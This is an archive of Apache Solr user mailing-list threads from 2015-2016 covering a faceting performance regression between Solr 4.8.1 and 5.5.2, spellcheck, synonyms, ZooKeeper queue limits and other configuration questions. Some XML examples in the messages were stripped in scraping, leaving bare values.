>> Certainly.  And I would of course welcome anyone else to test this for
>> themselves especially with facet.method=uif to see if that has indeed
>> bridged the gap between Solr 4 and Solr 5.  I would be very happy if my
>> testing is invalid due to variance, problem in process, etc.  One thing I
>> was pondering is if I should force merge the index to a certain amount of
>> segments because indexing yields a random number of segments and
>> deletions.  The only thing stopping me short of doing that were
>> observations of longer Solr 4 times even with more deletions and similar
>> number of segments.
>>
>> We use Soasta as our testing tool.  Before testing, load is sent for
>> 10-15 minutes to make sure any Solr caches have stabilized.  Then the test
>> is run for 30 minutes of steady volume with Scenario #1 tested at 15
>> req/sec and Scenario #2 tested at 100 req/sec.  Each request is different
>> with input being pulled from data files.  The requests are repeatable test
>> to test.
>>
>> The numbers posted above are average response times as reported by
>> Soasta.  However, respective time differences are supported by Splunk which
>> indexes the Solr logs and Dynatrace which is instrumented on one of the
>> JVM's.
>>
>> The versions are deployed to the same machines thereby overlaying the
>> previous installation.  Going Solr 4 to Solr 5, full indexing is run with
>> the same input data.  Being in SolrCloud mode, the full indexing comprises
>> of indexing all documents and then deleting any that were not touched.
>> Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not
>> load with a Solr 5 index.  Testing Solr 4 after reverting yields the same
>> results as the previous Solr 4 test.
>>
>>
>> On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk>
>> wrote:
>>
>>> On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote:
>>> > Further testing indicates that any performance difference is not due
>>> > to deletes.  Both Solr 4.8.1 and Solr 5.5.2 benefited from removing
>>> > deletes.
>>>
>>> Sanity check: Could you describe how you test?
>>>
>>> * How many queries do you issue for each test?
>>> * Are each query a new one or do you re-use the same query?
>>> * Do you discard the first X calls?
>>> * Are the numbers averages, medians or something third?
>>> * What do you do about disk cache?
>>> * Are both Solr's on the same machine?
>>> * Do they use the same index?
>>> * Do you alternate between testing 4.8.1 and 5.5.2 first?
>>>
>>> - Toke Eskildsen, State and University Library, Denmark
>>>
>>
>>
>


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-09-28 Thread Solr User
I plan to re-test this in a separate environment that I have more control
over and will share the results when I can.

On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote:

> Certainly.  And I would of course welcome anyone else to test this for
> themselves especially with facet.method=uif to see if that has indeed
> bridged the gap between Solr 4 and Solr 5.  I would be very happy if my
> testing is invalid due to variance, problem in process, etc.  One thing I
> was pondering is if I should force merge the index to a certain amount of
> segments because indexing yields a random number of segments and
> deletions.  The only thing stopping me short of doing that were
> observations of longer Solr 4 times even with more deletions and similar
> number of segments.
>
> We use Soasta as our testing tool.  Before testing, load is sent for 10-15
> minutes to make sure any Solr caches have stabilized.  Then the test is run
> for 30 minutes of steady volume with Scenario #1 tested at 15 req/sec and
> Scenario #2 tested at 100 req/sec.  Each request is different with input
> being pulled from data files.  The requests are repeatable test to test.
>
> The numbers posted above are average response times as reported by
> Soasta.  However, respective time differences are supported by Splunk which
> indexes the Solr logs and Dynatrace which is instrumented on one of the
> JVM's.
>
> The versions are deployed to the same machines thereby overlaying the
> previous installation.  Going Solr 4 to Solr 5, full indexing is run with
> the same input data.  Being in SolrCloud mode, the full indexing comprises
> of indexing all documents and then deleting any that were not touched.
> Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not
> load with a Solr 5 index.  Testing Solr 4 after reverting yields the same
> results as the previous Solr 4 test.
>
>
> On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk>
> wrote:
>
>> On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote:
>> > Further testing indicates that any performance difference is not due
>> > to deletes.  Both Solr 4.8.1 and Solr 5.5.2 benefited from removing
>> > deletes.
>>
>> Sanity check: Could you describe how you test?
>>
>> * How many queries do you issue for each test?
>> * Are each query a new one or do you re-use the same query?
>> * Do you discard the first X calls?
>> * Are the numbers averages, medians or something third?
>> * What do you do about disk cache?
>> * Are both Solr's on the same machine?
>> * Do they use the same index?
>> * Do you alternate between testing 4.8.1 and 5.5.2 first?
>>
>> - Toke Eskildsen, State and University Library, Denmark
>>
>
>


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-09-28 Thread Solr User
Certainly.  And I would of course welcome anyone else to test this for
themselves especially with facet.method=uif to see if that has indeed
bridged the gap between Solr 4 and Solr 5.  I would be very happy if my
testing is invalid due to variance, problem in process, etc.  One thing I
was pondering is if I should force merge the index to a certain amount of
segments because indexing yields a random number of segments and
deletions.  The only thing stopping me short of doing that were
observations of longer Solr 4 times even with more deletions and similar
number of segments.

We use Soasta as our testing tool.  Before testing, load is sent for 10-15
minutes to make sure any Solr caches have stabilized.  Then the test is run
for 30 minutes of steady volume with Scenario #1 tested at 15 req/sec and
Scenario #2 tested at 100 req/sec.  Each request is different with input
being pulled from data files.  The requests are repeatable test to test.

The numbers posted above are average response times as reported by Soasta.
However, respective time differences are supported by Splunk which indexes
the Solr logs and Dynatrace which is instrumented on one of the JVM's.

The versions are deployed to the same machines thereby overlaying the
previous installation.  Going Solr 4 to Solr 5, full indexing is run with
the same input data.  Being in SolrCloud mode, the full indexing comprises
of indexing all documents and then deleting any that were not touched.
Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not
load with a Solr 5 index.  Testing Solr 4 after reverting yields the same
results as the previous Solr 4 test.


On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk>
wrote:

> On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote:
> > Further testing indicates that any performance difference is not due
> > to deletes.  Both Solr 4.8.1 and Solr 5.5.2 benefited from removing
> > deletes.
>
> Sanity check: Could you describe how you test?
>
> * How many queries do you issue for each test?
> * Are each query a new one or do you re-use the same query?
> * Do you discard the first X calls?
> * Are the numbers averages, medians or something third?
> * What do you do about disk cache?
> * Are both Solr's on the same machine?
> * Do they use the same index?
> * Do you alternate between testing 4.8.1 and 5.5.2 first?
>
> - Toke Eskildsen, State and University Library, Denmark
>


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-09-27 Thread Solr User
Further testing indicates that any performance difference is not due to
deletes.  Both Solr 4.8.1 and Solr 5.5.2 benefited from removing deletes.
The times appear to converge on an optimized index.  Below are the
details.  Not sure what else to make of this at this point other than
moving forward with an upgrade with an optimized index wherever possible.

Scenario #1:  Using facet.method=uif with faceting on several multi-valued
fields.
4.8.1 (with deletes): 115 ms
5.5.2 (with deletes): 155 ms
4.8.1 (without deletes): 104 ms
5.5.2 (without deletes): 125 ms
4.8.1 (1 segment without deletes): 55 ms
5.5.2 (1 segment without deletes): 44 ms

Scenario #2:  Using facet.method=enum with faceting on several multi-valued
fields.  These fields are different than Scenario #1 and perform much
better with enum hence that method is used instead.
4.8.1 (with deletes): 38 ms
5.5.2 (with deletes): 49 ms
4.8.1 (without deletes): 35 ms
5.5.2 (without deletes): 42 ms
4.8.1 (1 segment without deletes): 28 ms
5.5.2 (1 segment without deletes): 34 ms

On Tue, Sep 27, 2016 at 3:45 AM, Alessandro Benedetti <abenede...@apache.org
> wrote:

> Hi !
> At the time we didn't investigate the deletion implication at all.
> This can be interesting.
> if you proceed with your investigations and discover what changed in the
> deletion approach, I would be more than happy to help!
>
> Cheers
>
> On Mon, Sep 26, 2016 at 10:59 PM, Solr User <solr...@gmail.com> wrote:
>
> > Thanks again for your work on honoring the facet.method.  I have an
> > observation that I would like to share and get your feedback on if
> > possible.
> >
> > I performance tested Solr 5.5.2 with various facet queries and the only
> way
> > I get comparable results to Solr 4.8.1 is when I expungeDeletes.  Is it
> > possible that Solr 5 is not as efficiently ignoring deletes as Solr 4?
> > Here are the details.
> >
> > Scenario #1:  Using facet.method=uif with faceting on several
> multi-valued
> > fields.
> > 4.8.1 (with deletes): 115 ms
> > 5.5.2 (with deletes): 155 ms
> > 5.5.2 (without deletes): 125 ms
> > 5.5.2 (1 segment without deletes): 44 ms
> >
> > Scenario #2:  Using facet.method=enum with faceting on several
> multi-valued
> > fields.  These fields are different than Scenario #1 and perform much
> > better with enum hence that method is used instead.
> > 4.8.1 (with deletes): 38 ms
> > 5.5.2 (with deletes): 49 ms
> > 5.5.2 (without deletes): 42 ms
> > 5.5.2 (1 segment without deletes): 34 ms
> >
> >
> >
> > On Tue, May 31, 2016 at 11:57 AM, Alessandro Benedetti <
> > abenede...@apache.org> wrote:
> >
> > > Interesting developments :
> > >
> > > https://issues.apache.org/jira/browse/SOLR-9176
> > >
> > > I think we found why term Enum seems slower in recent Solr !
> > > In our case it is likely to be related to the commit I mention in the
> > Jira.
> > > Have a check Joel !
> > >
> > > On Wed, May 25, 2016 at 12:30 PM, Alessandro Benedetti <
> > > abenede...@apache.org> wrote:
> > >
> > > > I am investigating this scenario right now.
> > > > I can confirm that the enum slowness is in Solr 6.0 as well.
> > > > And I agree with Joel, it seems to be un-related with the famous
> > faceting
> > > > regression :(
> > > >
> > > > Furthermore with the legacy facet approach, if you set docValues for
> > the
> > > > field you are not going to be able to try the enum approach anymore.
> > > >
> > > > org/apache/solr/request/SimpleFacets.java:448
> > > >
> > > > if (method == FacetMethod.ENUM && sf.hasDocValues()) {
> > > >   // only fc can handle docvalues types
> > > >   method = FacetMethod.FC;
> > > > }
> > > >
> > > >
> > > > I got really horrible regressions simply using term enum in both
> Solr 4
> > > > and Solr 6.
> > > >
> > > > And even the most optimized fcs approach with docValues and
> > > > facet.threads=nCore does not perform as the simple enum in Solr 4 .
> > > >
> > > > i.e.
> > > >
> > > > For some sample queries I have 40 ms vs 160 ms and similar...
> > > > I think we should open an issue if we can confirm it is not related
> > with
> > > > the other.
> > > > A lot of people will continue using the legacy approach for a
> while...
> > > >
> > > > On Wed, May 18, 2016 at 10:42 PM, Joel Bernstein <joels...@gmail.com
> >
&g

Re: Faceting and Grouping Performance Degradation in Solr 5

2016-09-26 Thread Solr User
Thanks again for your work on honoring the facet.method.  I have an
observation that I would like to share and get your feedback on if possible.

I performance tested Solr 5.5.2 with various facet queries and the only way
I get comparable results to Solr 4.8.1 is when I expungeDeletes.  Is it
possible that Solr 5 is not as efficiently ignoring deletes as Solr 4?
Here are the details.

Scenario #1:  Using facet.method=uif with faceting on several multi-valued
fields.
4.8.1 (with deletes): 115 ms
5.5.2 (with deletes): 155 ms
5.5.2 (without deletes): 125 ms
5.5.2 (1 segment without deletes): 44 ms

Scenario #2:  Using facet.method=enum with faceting on several multi-valued
fields.  These fields are different than Scenario #1 and perform much
better with enum hence that method is used instead.
4.8.1 (with deletes): 38 ms
5.5.2 (with deletes): 49 ms
5.5.2 (without deletes): 42 ms
5.5.2 (1 segment without deletes): 34 ms



On Tue, May 31, 2016 at 11:57 AM, Alessandro Benedetti <
abenede...@apache.org> wrote:

> Interesting developments :
>
> https://issues.apache.org/jira/browse/SOLR-9176
>
> I think we found why term Enum seems slower in recent Solr !
> In our case it is likely to be related to the commit I mention in the Jira.
> Have a check Joel !
>
> On Wed, May 25, 2016 at 12:30 PM, Alessandro Benedetti <
> abenede...@apache.org> wrote:
>
> > I am investigating this scenario right now.
> > I can confirm that the enum slowness is in Solr 6.0 as well.
> > And I agree with Joel, it seems to be un-related with the famous faceting
> > regression :(
> >
> > Furthermore with the legacy facet approach, if you set docValues for the
> > field you are not going to be able to try the enum approach anymore.
> >
> > org/apache/solr/request/SimpleFacets.java:448
> >
> > if (method == FacetMethod.ENUM && sf.hasDocValues()) {
> >   // only fc can handle docvalues types
> >   method = FacetMethod.FC;
> > }
> >
> >
> > I got really horrible regressions simply using term enum in both Solr 4
> > and Solr 6.
> >
> > And even the most optimized fcs approach with docValues and
> > facet.threads=nCore does not perform as the simple enum in Solr 4 .
> >
> > i.e.
> >
> > For some sample queries I have 40 ms vs 160 ms and similar...
> > I think we should open an issue if we can confirm it is not related with
> > the other.
> > A lot of people will continue using the legacy approach for a while...
> >
> > On Wed, May 18, 2016 at 10:42 PM, Joel Bernstein <joels...@gmail.com>
> > wrote:
> >
> >> The enum slowness is interesting. It would appear on the surface to not
> be
> >> related to the FieldCache issue. I don't think the main emphasis of the
> >> JSON facet API has been the enum approach. You may find using the JSON
> >> facet API and eliminating the use of enum meets your performance needs.
> >>
> >> With the CollapsingQParserPlugin top_fc is definitely faster during
> >> queries. The tradeoff is slower warming times and increased memory usage
> >> if
> >> the collapse fields are used in faceting, as faceting will load the
> field
> >> into a different cache.
> >>
> >> Joel Bernstein
> >> http://joelsolr.blogspot.com/
> >>
> >> On Wed, May 18, 2016 at 5:28 PM, Solr User <solr...@gmail.com> wrote:
> >>
> >> > Joel,
> >> >
> >> > Thank you for taking the time to respond to my question.  I tried the
> >> JSON
> >> > Facet API for one query that uses facet.method=enum (since this one
> has
> >> a
> >> > ton of unique values and performed better with enum) but this was way
> >> > slower than even the slower Solr 5 times.  I did not try the new API
> >> with
> >> > the non-enum queries though so I will give that a go.  It looks like
> >> Solr
> >> > 5.5.1 also has a facet.method=uif which will be interesting to try.
> >> >
> >> > If these do not prove helpful, it looks like I will need to wait for
> >> > SOLR-8096 to be resolved before upgrading.
> >> >
> >> > Thanks also for your comment on top_fc for the CollapsingQParser.  I
> use
> >> > collapse/expand for some queries but traditional grouping for others
> >> due to
> >> > performance.  It will be interesting to see if those grouping queries
> >> > perform better now using CollapsingQParser with top_fc.
> >> >
> >> > On Wed, May 18, 2016 at 11:39 AM, Joel Bernstein <joels...@gmail.com>
> >> > wrot

Re: Solr 4.3.1 - Spell-Checker with MULTI-WORD PHRASE

2016-07-22 Thread SRINI SOLR
Hi all - please help me here

On Thursday, July 21, 2016, SRINI SOLR <srini.s...@gmail.com> wrote:
> Hi All -
> Could you please help me on spell check on multi-word phrase as a whole...
> Scenario -
> I have a problem with solr spellcheck suggestions for multi word phrases.
With the query for 'red chillies'
>
>
q=red+chillies=xml=true=true=true=true
>
> I get
>
> 
> 
> 2
> 4
> 12
> 0
> 
> chiller4
> challis2
> 
> 
> false
> red chiller
> 
>
> The problem is, even though 'chiller' has 4 results in index, 'red
chiller' has none. So we end up suggesting a phrase with 0 result.
>
> What can I do to make spellcheck work on the whole phrase only?
>
> Please help me here ...


Solr 4.3.1 - Spell-Checker with MULTI-WORD PHRASE

2016-07-21 Thread SRINI SOLR
Hi All -
Could you please help me on spell check on multi-word phrase as a whole...

Scenario -
I have a problem with solr spellcheck suggestions for multi word phrases.
With the query for 'red chillies'

q=red+chillies=xml=true=true=true=true

I get


  
2
4
12
0

  chiller4
  challis2

  
  false
  red chiller


The problem is, even though 'chiller' has 4 results in index, 'red chiller'
has none. So we end up suggesting a phrase with 0 result.

What can I do to make spellcheck work on the whole phrase only?



Please help me here ...


Recommendations for analyzing Korean?

2016-06-14 Thread Solr List
Hi -

What's the current recommendation for searching/analyzing Korean?

The reference guide only lists CJK:
https://cwiki.apache.org/confluence/display/solr/Language+Analysis

I see a bunch of work was done on
https://issues.apache.org/jira/browse/LUCENE-4956, but it doesn't look like
that was ever committed - and the last comment was years ago.

There seem to be a few version of this in the wild, both more recent:
https://github.com/juncon/arirang.lucene-analyzer-5.0.0, and the original:
https://sourceforge.net/projects/lucenekorean/ but I'm not sure what's the
canonical source at this point.

I also see this: https://bitbucket.org/eunjeon/mecab-ko-lucene-analyzer

Suggestions?

Thanks,

Tom


Re: Sorl 4.3.1 - Does not load the new data using the Java application

2016-06-09 Thread SRINI SOLR
Hi Upayavira / Team -
Can you please explain in-detail - how to do the commit...?

if we do the commit - Will the new data will be available to Java
Application with-out calling *embeddedSolrServer.*
*getCoreContainer().load()*. again. ...?

Please help me here ...

Thanks in Advance.








On Thu, Jun 9, 2016 at 4:08 PM, Upayavira <u...@odoko.co.uk> wrote:

> Are you executing a commit?
>
> You must commit before your content becomes visible.
>
> Upayavira
>
> On Thu, 9 Jun 2016, at 11:13 AM, SRINI SOLR wrote:
> > Hi Team -
> > Can you please help me out on the below issue ...
> >
> > We are using the Solr 4.3.1 version.
> >
> > Integrated Solr 4.3.1 with Java application using EmbeddedSolrServer.
> >
> > Using this EmbeddedSolrServer in java -  loading the core container as
> > below ...
> > *embeddedSolrServer.getCoreContainer().load();*
> >
> > We are loading the container at the time of initiating the
> > ApplicationContext. And now Java application is able to access the
> > indexed
> > data.
> >
> > *Now the issue is  - *
> > *If I index the new data in Solr - the same data is not getting loaded
> > through Java application until and un-less if I again load the Core
> > Container using **embeddedSolrServer.getCoreContainer().load().*
> >
> > Can you please help me out to on how to access the new data (which is
> > indexed on Solr) using java application with out calling every-time
> > *embeddedSolrServer.getCoreContainer().load().*
> >
> > *??? *
> >
> > *Please help me out ... I am stuck and not able to proceed further ... It
> > is leading to critical issue ...*
> >
> > *Thanks In Advance.*
>


Sorl 4.3.1 - Does not load the new data using the Java application

2016-06-09 Thread SRINI SOLR
Hi Team -
Can you please help me out on the below issue ...

We are using the Solr 4.3.1 version.

Integrated Solr 4.3.1 with Java application using EmbeddedSolrServer.

Using this EmbeddedSolrServer in java -  loading the core container as
below ...
*embeddedSolrServer.getCoreContainer().load();*

We are loading the container at the time of initiating the
ApplicationContext. And now Java application is able to access the indexed
data.

*Now the issue is  - *
*If I index the new data in Solr - the same data is not getting loaded
through Java application until and un-less if I again load the Core
Container using **embeddedSolrServer.getCoreContainer().load().*

Can you please help me out to on how to access the new data (which is
indexed on Solr) using java application with out calling every-time
*embeddedSolrServer.getCoreContainer().load().*

*??? *

*Please help me out ... I am stuck and not able to proceed further ... It
is leading to critical issue ...*

*Thanks In Advance.*


Re: Indexing a (File attached to a document)

2016-05-24 Thread Solr User
Hi 
I am using MapReduceIndexer Tool to index data from hdfs , using morphlines
as ETL tool.

Specifying data path as xpath's in morphline file.

sorry for delay



--
View this message in context: 
http://lucene.472066.n3.nabble.com/Indexing-a-File-attached-to-a-document-tp4276334p4278730.html
Sent from the Solr - User mailing list archive at Nabble.com.


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-05-18 Thread Solr User
Joel,

Thank you for taking the time to respond to my question.  I tried the JSON
Facet API for one query that uses facet.method=enum (since this one has a
ton of unique values and performed better with enum) but this was way
slower than even the slower Solr 5 times.  I did not try the new API with
the non-enum queries though so I will give that a go.  It looks like Solr
5.5.1 also has a facet.method=uif which will be interesting to try.

If these do not prove helpful, it looks like I will need to wait for
SOLR-8096 to be resolved before upgrading.

Thanks also for your comment on top_fc for the CollapsingQParser.  I use
collapse/expand for some queries but traditional grouping for others due to
performance.  It will be interesting to see if those grouping queries
perform better now using CollapsingQParser with top_fc.

On Wed, May 18, 2016 at 11:39 AM, Joel Bernstein <joels...@gmail.com> wrote:

> Yes, SOLR-8096 is the issue here.
>
> I don't believe indexing with docValues is going to help too much with
> this. The enum slowness may not be related, but I'm not positive about
> that.
>
> The major slowdowns are likely due to the removal of the top level
> FieldCache from general use and the removal of the FieldValuesCache which
> was used for multi-value field faceting.
>
> The JSON facet API covers all the functionality in the traditional
> faceting, and it has been developed to be very performant.
>
> You may also want to see if Collapse/Expand can meet your applications
> needs rather Grouping. It allows you to specify using a top level
> FieldCache if performance is a blocker without it.
>
>
>
>
> Joel Bernstein
> http://joelsolr.blogspot.com/
>
> On Wed, May 18, 2016 at 10:42 AM, Solr User <solr...@gmail.com> wrote:
>
> > Does anyone know the answer to this?
> >
> > On Wed, May 4, 2016 at 2:19 PM, Solr User <solr...@gmail.com> wrote:
> >
> > > I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but
> > had
> > > to abort due to average response times degraded from a baseline volume
> > > performance test.  The affected queries involved faceting (both enum
> > method
> > > and default) and grouping.  There is a critical bug
> > > https://issues.apache.org/jira/browse/SOLR-8096 currently open which I
> > > gather is the cause of the slower response times.  One concern I have
> is
> > > that discussions around the issue offer the suggestion of indexing with
> > > docValues which alleviated the problem in at least that one reported
> > case.
> > > However, indexing with docValues did not improve the performance in my
> > case.
> > >
> > > Can someone please confirm or correct my understanding that this issue
> > has
> > > no path forward at this time and specifically that it is already known
> > that
> > > docValues does not necessarily solve this?
> > >
> > > Thanks in advance!
> > >
> > >
> > >
> >
>


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-05-18 Thread Solr User
Does anyone know the answer to this?

On Wed, May 4, 2016 at 2:19 PM, Solr User <solr...@gmail.com> wrote:

> I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but had
> to abort due to average response times degraded from a baseline volume
> performance test.  The affected queries involved faceting (both enum method
> and default) and grouping.  There is a critical bug
> https://issues.apache.org/jira/browse/SOLR-8096 currently open which I
> gather is the cause of the slower response times.  One concern I have is
> that discussions around the issue offer the suggestion of indexing with
> docValues which alleviated the problem in at least that one reported case.
> However, indexing with docValues did not improve the performance in my case.
>
> Can someone please confirm or correct my understanding that this issue has
> no path forward at this time and specifically that it is already known that
> docValues does not necessarily solve this?
>
> Thanks in advance!
>
>
>


Re: Filter query (fq) on comma seperated value does not work

2016-05-16 Thread SRINI SOLR
Hi Ahmet / Team -
Thanks for your quick response...

Can you please help me out on this PatternTokenizer configuration...
Here we are using configuration as below ...

















And also - I have made changes to the field value so that it is separated
by space instead of commas and indexed the data as such... And now I was
able to retrieve the expected results.

But Still Can you help me out in achieving the results using the comma as
you suggested.

Thanks & Regards

On Mon, May 16, 2016 at 5:50 PM, Ahmet Arslan <iori...@yahoo.com.invalid>
wrote:

> Hi,
>
> Its all about how you tokenize the category field.
> It looks like you are using a string type, which does not tokenize at all
> (e.g. verbatim)
> Please use a PatterTokenizer and configure it so that it splits on comma.
>
> Ahmet
>
>
>
> On Monday, May 16, 2016 2:11 PM, SRINI SOLR <srini.s...@gmail.com> wrote:
> Hi Team -
> Can you please help me out on the following ...
>
> I have a following field in the solr document which has the comma seperated
> values like below ..
>
> 1,456,768,345  doc1
> 456 doc2
> 1,456  doc3
>
> So - Here I need to filter the search docs which contains category is
> 456...
> when i do like following ...
>
> fq=category:456
>
> it is returning only one document doc2 which has only category is 456.
> 456
>
> But I need other two also which as this category 456
>
> Can you please help me out to achieve this ...
>
>
> Thanks & Regards
>


Filter query (fq) on comma seperated value does not work

2016-05-16 Thread SRINI SOLR
Hi Team -
Can you please help me out on the following ...

I have a following field in the solr document which has the comma seperated
values like below ..

1,456,768,345  doc1
456 doc2
1,456  doc3

So - Here I need to filter the search docs which contains category is 456...
when i do like following ...

fq=category:456

it is returning only one document doc2 which has only category is 456.
456

But I need other two also which as this category 456

Can you please help me out to achieve this ...


Thanks & Regards


Indexing a (File attached to a document)

2016-05-12 Thread Solr User
Hi

If I index a document with a file attachment attached to it in solr, can I
visualise data of that attached file attachment also while querying that
particular document? Please help me on this


Thanks & Regards
Vidya Nadella



--
View this message in context: 
http://lucene.472066.n3.nabble.com/Indexing-a-File-attached-to-a-document-tp4276334.html
Sent from the Solr - User mailing list archive at Nabble.com.


Multi-word Synonyms Solr 4.3.1 does not work

2016-05-06 Thread SRINI SOLR
Hi All -
Can you please help me out on the multi-word synonyms with Solr 4.3.1.

I am using the synonyms as below 

test1,test2 => movie1 cinema,movie2 cinema,movie3 cinema

I am able to success with the above syntax  like - if I search for
words like test1 or test2  then right hand side multi-word values are shown.

But -

I have a synonyms like below - multi-word on both the side left-hand and
right-hand...

test1 test, test2 test, test3 test =>movie1 cinema,movie2 cinema,movie3
cinema

With the above left-hand multi-word format - not working as expected 
means 

Here below is the configuration I am using on query analyzer ...




Please Help me 


Faceting and Grouping Performance Degradation in Solr 5

2016-05-04 Thread Solr User
I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but had
to abort due to average response times degraded from a baseline volume
performance test.  The affected queries involved faceting (both enum method
and default) and grouping.  There is a critical bug
https://issues.apache.org/jira/browse/SOLR-8096 currently open which I
gather is the cause of the slower response times.  One concern I have is
that discussions around the issue offer the suggestion of indexing with
docValues which alleviated the problem in at least that one reported case.
However, indexing with docValues did not improve the performance in my case.

Can someone please confirm or correct my understanding that this issue has
no path forward at this time and specifically that it is already known that
docValues does not necessarily solve this?

Thanks in advance!


EmbeddedSolrServer Loading Core Containers Solr 4.3.1

2016-05-02 Thread SRINI SOLR
Hi Team -
I am using Solr 4.3.1.

We are using this EmbeddedSolrServer to load Core Containers in one of the
java application.

This is setup as a cron job for every 1 hour to load the new data on to the
containers.

Otherwise - the new data is not getting loaded on the containers , if we
access from Java application even after re-indexing also.

Please help here to resolve the issue ...?


want to subscribe

2016-04-18 Thread SRINI SOLR



Re: Solr 4.7.2 Vs 5.3.0 Docs different for same query

2015-10-02 Thread Ravi Solr
Mr. Uchida,
Thank you for responding. It was my fault, I had a update processor
which takes specific text and string fields and concatenates them into a
single field, and I search on that single field. Recently I used Atomic
update to fix a specific field's value and forgot to disable the
UpdateProcessor chain...Since I was only updating one field the aggregate
field got messed up with just that field value and hence I had issues
searching. I reindexed the data again yesterday night and now it is all
good.

I do have a small question, when we update the zookeeper ensemble with new
configs via 'upconfig' and 'linkconfig' commands do we have to "reload" the
collections on all the nodes to see the updated config ?? Is there a single
call which can update all nodes connected to the ensemble ?? I just went to
the admin UI and hit "Reload" button manually on each of the node...Is that
the correct way to do it ?

Thanks

Ravi Kiran Bhaskar

On Fri, Oct 2, 2015 at 12:04 AM, Tomoko Uchida <tomoko.uchida.1...@gmail.com
> wrote:

> Are you sure that you've indexed same data to Solr 4.7.2 and 5.3.0 ?
> If so, I suspect that you have multiple shards and request to one shard.
> (In that case, you might get partial results)
>
> Can you share HTTP request url and the schema and default search field ?
>
>
> 2015-10-02 6:09 GMT+09:00 Ravi Solr <ravis...@gmail.com>:
>
> > I we migrated from 4.7.2 to 5.3.0. I sourced the docs from 4.7.2 core and
> > indexed into 5.3.0 collection (data directories are different) via
> > SolrEntityProcessor. Currently my production is all whack because of this
> > issue. Do I have to go back and reindex all again ?? Is there a quick fix
> > for this ?
> >
> > Here are the results for the query 'obama'...please note the numfound.
> > 4.7.2 has almost 148519 docs while 5.3.0 says it only has 5.3.0 docs. Any
> > pointers on how to correct this ?
> >
> >
> > Solr 4.7.2
> >
> > 
> > 
> >   0
> >   2
> >   
> >  obama
> >   0
> >
> >   
> >   
> > 
> >
> > SolrCloud 5.3.0
> >
> > 
> >   
> >0
> >2
> >
> > obama
> > 0
> > 
> >
> >
> > 
> >
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
> >
>


Re: Zk and Solr Cloud

2015-10-02 Thread Ravi Solr
Awesome nugget Shawn, I also faced similar issue a while ago while i was
doing a full re-index. It would be great if such tips are added into FAQ
type documentation on cwiki. I love the SOLR forum everyday I learn
something new :-)

Thanks

Ravi Kiran Bhaskar

On Fri, Oct 2, 2015 at 1:58 AM, Shawn Heisey <apa...@elyograg.org> wrote:

> On 10/1/2015 1:26 PM, Rallavagu wrote:
> > Solr 4.6.1 single shard with 4 nodes. Zookeeper 3.4.5 ensemble of 3.
> >
> > See following errors in ZK and Solr and they are connected.
> >
> > When I see the following error in Zookeeper,
> >
> > unexpected error, closing socket connection and attempting reconnect
> > java.io.IOException: Packet len11823809 is out of range!
>
> This is usually caused by the overseer queue (stored in zookeeper)
> becoming extraordinarily huge, because it's being flooded with work
> entries far faster than the overseer can process them.  This causes the
> znode where the queue is stored to become larger than the maximum size
> for a znode, which defaults to about 1MB.  In this case (reading your
> log message that says len11823809), something in zookeeper has gotten to
> be 11MB in size, so the zookeeper client cannot read it.
>
> I think the zookeeper server code must be handling the addition of
> children to the queue znode through a code path that doesn't pay
> attention to the maximum buffer size, just goes ahead and adds it,
> probably by simply appending data.  I'm unfamiliar with how the ZK
> database works, so I'm guessing here.
>
> If I'm right about where the problem is, there are two workarounds to
> your immediate issue.
>
> 1) Delete all the entries in your overseer queue using a zookeeper
> client that lets you edit the DB directly.  If you haven't changed the
> cloud structure and all your servers are working, this should be safe.
>
> 2) Set the jute.maxbuffer system property on the startup commandline for
> all ZK servers and all ZK clients (Solr instances) to a size that's
> large enough to accommodate the huge znode.  In order to do the deletion
> mentioned in option 1 above,you might need to increase jute.maxbuffer on
> the servers and the client you use for the deletion.
>
> These are just workarounds.  Whatever caused the huge queue in the first
> place must be addressed.  It is frequently a performance issue.  If you
> go to the following link, you will see that jute.maxbuffer is considered
> an unsafe option:
>
> http://zookeeper.apache.org/doc/r3.3.3/zookeeperAdmin.html#Unsafe+Options
>
> In Jira issue SOLR-7191, I wrote the following in one of my comments:
>
> "The giant queue I encountered was about 85 entries, and resulted in
> a packet length of a little over 14 megabytes. If I divide 85 by 14,
> I know that I can have about 6 overseer queue entries in one znode
> before jute.maxbuffer needs to be increased."
>
> https://issues.apache.org/jira/browse/SOLR-7191?focusedCommentId=14347834
>
> Thanks,
> Shawn
>
>


Re: Reverse query?

2015-10-02 Thread Ravi Solr
Hello Remi,
Iam assuming the field where you store the data is analyzed.
The field definition might help us answer your question better. If you are
using edismax handler for your search requests, I believe you can achieve
you goal by setting set your "mm" to 100%, phrase slop "ps" and query slop
"qs" parameters to zero. I think that will force exact matches.

Thanks

Ravi Kiran Bhaskar

On Fri, Oct 2, 2015 at 9:48 AM, Andrea Roggerone <
andrearoggerone.o...@gmail.com> wrote:

> Hi Remy,
> The question is not really clear, could you explain a little bit better
> what you need? Reading your email I understand that you want to get
> documents containing all the search terms typed. For instance if you search
> for "Mad Max", you wanna get documents containing both Mad and Max. If
> that's your need, you can use a phrase query like:
>
> *"*Mad Max*"~2*
>
> where enclosing your keywords between double quotes means that you want to
> get both Mad and Max and the optional parameter ~2 is an example of *slop*.
> If you need more info you can look for *Phrase Query* in
> https://wiki.apache.org/solr/SolrRelevancyFAQ
>
> On Fri, Oct 2, 2015 at 2:33 PM, remi tassing <tassingr...@gmail.com>
> wrote:
>
> > Hi,
> > I have medium-low experience on Solr and I have a question I couldn't
> quite
> > solve yet.
> >
> > Typically we have quite short query strings (a couple of words) and the
